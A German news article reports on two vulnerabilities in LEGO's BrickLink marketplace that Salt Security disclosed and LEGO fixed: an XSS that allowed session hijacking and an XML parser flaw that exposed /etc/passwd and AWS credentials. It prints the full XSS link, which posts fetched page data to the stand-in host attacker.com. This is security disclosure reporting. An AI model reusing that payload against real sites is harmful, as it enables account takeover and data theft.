Die Handelsplattform BrickLink beheimatet Daten von mehr als einer Million treuer LEGO-Fans. Ein gefundenes Fressen für Cyberkriminelle.
Der unter dem Namen BrickLink geführte Marktplatz von LEGO zählt über eine Million registrierte Benutzer und verfügt damit über einen großen Pool an Nutzerdaten, die für Cyberkriminelle durchaus interessant sein könnten. Wie einfach der Zugriff darauf sein kann, demonstrierten Sicherheitsexperten von Salt Security.
Daten von mehr als einer Million Benutzer waren in Gefahr
Sicherheitsforscher von Salt Security haben zwei Schwachstellen in der API von LEGOs BrickLink-Plattform aufgedeckt. Dadurch war es Angreifern mitunter möglich, Benutzerkonten vollständig zu übernehmen, auf personenbezogene Daten sowie interne Produktionsdaten zuzugreifen und die Serversysteme der Handelsplattform zu kompromittieren.
Bei BrickLink handelt es sich um den offiziellen Marktplatz der LEGO-Gruppe. Zugleich ist dort die weltweit größte Online-Community für LEGO-Fans mit mehr als einer Million registrierten Benutzern beheimatet.
Die Aufdeckung der Sicherheitslücken gelang den Forschern durch einfaches Experimentieren mit Eingabefeldern auf der BrickLink-Webseite. Sie stellten beispielsweise fest, dass sich durch einen speziell gestalteten Link, eingefügt in das Feld „Find Username“ des Coupon-Suchbereichs, bösartiger Code auf dem Rechner eines Benutzers der Plattform einschleusen und ausführen lässt.
Kontoübernahme von LEGO-Liebhabern durch nur einen Klick
So konnten die Forscher die Sitzung einer Zielperson durch sogenanntes Cross-Site-Scripting (XSS) übernehmen und sich damit Zugang zum jeweiligen Benutzerkonto verschaffen. Alles, was sie laut BleepingComputer dafür benötigten, war die Sitzungs-ID des auf BrickLink angemeldeten Opfers.
Um diese zu erhalten, erstellten die Forscher einen speziellen Link:
https://bricklink.com/orderCoupons.asp?v=W&viewUsername=xss"onfocus="fetch('https://www.bricklink.com/v3/member/community_experts.page').then(response=>response.text()).then(data=>fetch('https://attacker.com',{method:'POST',mode: 'no-cors',body:data}));"+autofocus="
Sobald ein Benutzer diesen anklickt, liest der darin eingebettete Code automatisch die Session-ID aus der Abfrage eines API-Endpunktes der LEGO-Plattform und übermittelt sie an einen fiktiven und von Angreifern kontrollierten Server.
Daraufhin konnten Cyberkriminelle Zugriff auf sämtliche in dem BrickLink-Benutzerkonto verfügbare Daten erlangen. Darunter auch Wunschlisten, Nachrichtenverläufe, Gutscheine, getätigte Bestellungen, Lieferadressen und E-Mail-Adressen.
Selbst die AWS-Zugangsdaten waren bei LEGO nicht sicher
Die zweite Schwachstelle bezog sich auf BrickLinks Funktion „Upload to Wanted List„. Darüber können Anwender ganze XML-Listen mit LEGO-Teilen hochladen, die sie auf der Plattform suchen möchten.
Hier gelang es den Forschern, den XML-Parser durch spezielle Befehle dazu zu bringen, ganze Systemdateien vom Webserver offenzulegen. Dies verdeutlichten sie in ihrem Bericht eindrucksvoll, indem sie den Server dazu veranlassten, den vollständigen Inhalt der „/etc/passwd“ auszugeben. Letztendlich konnten die Sicherheitsforscher dem System sogar seine AWS-EC2-Zugangsdaten entlocken.
Nachdem Salt Security die Erkenntnisse an LEGO gemeldet hatte, ergriff das Unternehmen entsprechende Maßnahmen und schloss die genannten Sicherheitslücken auf BrickLink.